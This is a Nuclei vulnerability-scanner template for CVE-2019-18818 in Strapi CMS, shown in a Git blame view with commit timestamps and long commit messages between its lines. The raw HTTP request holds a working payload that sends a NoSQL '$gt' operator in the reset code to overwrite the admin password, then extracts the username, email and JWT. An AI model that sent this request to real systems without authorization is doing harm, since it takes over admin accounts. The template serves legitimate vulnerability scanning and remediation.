nuclei-templates/http/cves/2019/CVE-2019-18818.yaml

66 lines
2.0 KiB
YAML
Raw Normal View History

id: CVE-2019-18818
info:
name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
author: idealphase
severity: critical
description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
2023-09-06 12:53:28 +00:00
remediation: |
Upgrade Strapi CMS to a version higher than 3.0.0-beta.17.5 to mitigate the vulnerability.
reference:
2021-09-05 10:21:47 +00:00
- https://github.com/advisories/GHSA-6xc2-mj39-q599
- https://www.exploit-db.com/exploits/50239
- https://nvd.nist.gov/vuln/detail/CVE-2019-18818
- https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5
2023-07-11 19:49:27 +00:00
- https://github.com/strapi/strapi/pull/4443
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-18818
cwe-id: CWE-640
2023-10-14 11:27:55 +00:00
epss-score: 0.88966
epss-percentile: 0.98421
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: strapi
product: strapi
tags: cve2019,strapi,auth-bypass,intrusive,edb,cve
http:
2021-09-05 10:21:47 +00:00
- raw:
- |
POST /admin/auth/reset-password HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
Restoring Empty Lines (#4340) * Enhancement: cves/2021/CVE-2021-34473.yaml by mp * Enhancement: cves/2021/CVE-2021-34621.yaml by mp * Enhancement: cves/2021/CVE-2021-35336.yaml by mp * Enhancement: cves/2021/CVE-2021-35464.yaml by mp * Enhancement: cves/2021/CVE-2021-35587.yaml by mp * Enhancement: cves/2021/CVE-2021-3577.yaml by mp * Enhancement: cves/2021/CVE-2021-36260.yaml by mp * Enhancement: cves/2021/CVE-2021-36380.yaml by mp * Enhancement: cves/2021/CVE-2021-40323.yaml by mp * Enhancement: cves/2021/CVE-2021-39226.yaml by mp * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Enhancement: cves/2021/CVE-2021-37580.yaml by mp * Enhancement: cves/2021/CVE-2021-37538.yaml by mp * Enhancement: cves/2021/CVE-2021-34473.yaml by mp * Enhancement: cves/2021/CVE-2021-35336.yaml by mp * Enhancement: cves/2021/CVE-2021-3577.yaml by mp * Enhancement: cves/2021/CVE-2021-36260.yaml by mp * Enhancement: cves/2021/CVE-2021-36380.yaml by mp * Enhancement: cves/2021/CVE-2021-37538.yaml by mp * Enhancement: cves/2021/CVE-2021-37580.yaml by mp * Spacing and spelling * remove blank lines introduced by dashboard * Enhancement: cves/2019/CVE-2019-1821.yaml by mp * Enhancement: cves/2019/CVE-2019-18394.yaml by mp * Enhancement: cves/2019/CVE-2019-18818.yaml by mp * Enhancement: cves/2019/CVE-2019-19781.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-3396.yaml by mp * Enhancement: cves/2019/CVE-2019-3929.yaml by mp * Enhancement: cves/2019/CVE-2019-5127.yaml by mp * Enhancement: cves/2019/CVE-2019-7238.yaml by mp * Enhancement: cves/2019/CVE-2019-7256.yaml by mp * Enhancement: cves/2019/CVE-2019-7609.yaml by mp * Enhancement: cves/2019/CVE-2019-8982.yaml by mp * Enhancement: cves/2019/CVE-2019-9618.yaml by mp * Enhancement: cves/2019/CVE-2019-9670.yaml by mp * Enhancement: cves/2019/CVE-2019-1821.yaml by mp * Enhancement: cves/2019/CVE-2019-18394.yaml by mp * Enhancement: cves/2019/CVE-2019-19781.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-5127.yaml by mp * Enhancement: cves/2019/CVE-2019-9618.yaml by mp * Enhancement: cves/2019/CVE-2019-9670.yaml by mp * Enhancement: cves/2005/CVE-2005-2428.yaml by mp * Enhancement: cves/2019/CVE-2019-2579.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-6112.yaml by mp * Enhancement: cves/2019/CVE-2019-9733.yaml by mp * Enhancement: cves/2020/CVE-2020-11034.yaml by mp * Enhancement: cves/2020/CVE-2020-11529.yaml by mp * Enhancement: cves/2020/CVE-2020-11546.yaml by mp * Enhancement: cves/2020/CVE-2020-12116.yaml by mp * Enhancement: cves/2020/CVE-2020-12447.yaml by mp * Enhancement: cves/2020/CVE-2020-17453.yaml by mp * Enhancement: cves/2020/CVE-2020-19360.yaml by mp * Enhancement: cves/2020/CVE-2020-2140.yaml by mp * Enhancement: cves/2020/CVE-2020-23575.yaml by mp * Enhancement: cves/2020/CVE-2020-24223.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-2579.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-6112.yaml by mp * Enhancement: cves/2019/CVE-2019-9733.yaml by mp * Enhancement: cves/2020/CVE-2020-11034.yaml by mp * Enhancement: cves/2020/CVE-2020-11529.yaml by mp * Enhancement: cves/2020/CVE-2020-12116.yaml by mp * Enhancement: cves/2020/CVE-2020-12447.yaml by mp * Enhancement: cves/2020/CVE-2020-2140.yaml by mp * Enhancement: cves/2020/CVE-2020-14092.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * standardizing enhanced by tag * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines Co-authored-by: sullo <sullo@cirt.net>
2022-05-10 07:05:15 +00:00
2021-09-05 10:21:47 +00:00
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
Restoring Empty Lines (#4340) * Enhancement: cves/2021/CVE-2021-34473.yaml by mp * Enhancement: cves/2021/CVE-2021-34621.yaml by mp * Enhancement: cves/2021/CVE-2021-35336.yaml by mp * Enhancement: cves/2021/CVE-2021-35464.yaml by mp * Enhancement: cves/2021/CVE-2021-35587.yaml by mp * Enhancement: cves/2021/CVE-2021-3577.yaml by mp * Enhancement: cves/2021/CVE-2021-36260.yaml by mp * Enhancement: cves/2021/CVE-2021-36380.yaml by mp * Enhancement: cves/2021/CVE-2021-40323.yaml by mp * Enhancement: cves/2021/CVE-2021-39226.yaml by mp * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Enhancement: cves/2021/CVE-2021-37580.yaml by mp * Enhancement: cves/2021/CVE-2021-37538.yaml by mp * Enhancement: cves/2021/CVE-2021-34473.yaml by mp * Enhancement: cves/2021/CVE-2021-35336.yaml by mp * Enhancement: cves/2021/CVE-2021-3577.yaml by mp * Enhancement: cves/2021/CVE-2021-36260.yaml by mp * Enhancement: cves/2021/CVE-2021-36380.yaml by mp * Enhancement: cves/2021/CVE-2021-37538.yaml by mp * Enhancement: cves/2021/CVE-2021-37580.yaml by mp * Spacing and spelling * remove blank lines introduced by dashboard * Enhancement: cves/2019/CVE-2019-1821.yaml by mp * Enhancement: cves/2019/CVE-2019-18394.yaml by mp * Enhancement: cves/2019/CVE-2019-18818.yaml by mp * Enhancement: cves/2019/CVE-2019-19781.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-3396.yaml by mp * Enhancement: cves/2019/CVE-2019-3929.yaml by mp * Enhancement: cves/2019/CVE-2019-5127.yaml by mp * Enhancement: cves/2019/CVE-2019-7238.yaml by mp * Enhancement: cves/2019/CVE-2019-7256.yaml by mp * Enhancement: cves/2019/CVE-2019-7609.yaml by mp * Enhancement: cves/2019/CVE-2019-8982.yaml by mp * Enhancement: cves/2019/CVE-2019-9618.yaml by mp * Enhancement: cves/2019/CVE-2019-9670.yaml by mp * Enhancement: cves/2019/CVE-2019-1821.yaml by mp * Enhancement: cves/2019/CVE-2019-18394.yaml by mp * Enhancement: cves/2019/CVE-2019-19781.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-2725.yaml by mp * Enhancement: cves/2019/CVE-2019-5127.yaml by mp * Enhancement: cves/2019/CVE-2019-9618.yaml by mp * Enhancement: cves/2019/CVE-2019-9670.yaml by mp * Enhancement: cves/2005/CVE-2005-2428.yaml by mp * Enhancement: cves/2019/CVE-2019-2579.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-6112.yaml by mp * Enhancement: cves/2019/CVE-2019-9733.yaml by mp * Enhancement: cves/2020/CVE-2020-11034.yaml by mp * Enhancement: cves/2020/CVE-2020-11529.yaml by mp * Enhancement: cves/2020/CVE-2020-11546.yaml by mp * Enhancement: cves/2020/CVE-2020-12116.yaml by mp * Enhancement: cves/2020/CVE-2020-12447.yaml by mp * Enhancement: cves/2020/CVE-2020-17453.yaml by mp * Enhancement: cves/2020/CVE-2020-19360.yaml by mp * Enhancement: cves/2020/CVE-2020-2140.yaml by mp * Enhancement: cves/2020/CVE-2020-23575.yaml by mp * Enhancement: cves/2020/CVE-2020-24223.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-2579.yaml by mp * Enhancement: cves/2019/CVE-2019-2578.yaml by mp * Enhancement: cves/2019/CVE-2019-6112.yaml by mp * Enhancement: cves/2019/CVE-2019-9733.yaml by mp * Enhancement: cves/2020/CVE-2020-11034.yaml by mp * Enhancement: cves/2020/CVE-2020-11529.yaml by mp * Enhancement: cves/2020/CVE-2020-12116.yaml by mp * Enhancement: cves/2020/CVE-2020-12447.yaml by mp * Enhancement: cves/2020/CVE-2020-2140.yaml by mp * Enhancement: cves/2020/CVE-2020-14092.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * standardizing enhanced by tag * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines Co-authored-by: sullo <sullo@cirt.net>
2022-05-10 07:05:15 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: header
words:
- "application/json"
- type: word
2023-07-11 19:49:27 +00:00
part: body
words:
2021-09-05 10:21:47 +00:00
- '"username":'
- '"email":'
- '"jwt":'
2023-07-11 19:49:27 +00:00
condition: and
- type: status
status:
- 200
2021-09-05 10:21:47 +00:00
extractors:
- type: json
json:
- .user.username
- .user.email
# digest: 4b0a00483046022100c3125ca747f5456feffd32b16a6c0beaac661744e3ae33a2e96a32d613750a90022100c2359cb19269aaba07b20fe4eff815bd5a1692623e099993e477ae979a935ca6:922c64590222798bb761d5b6d8e72950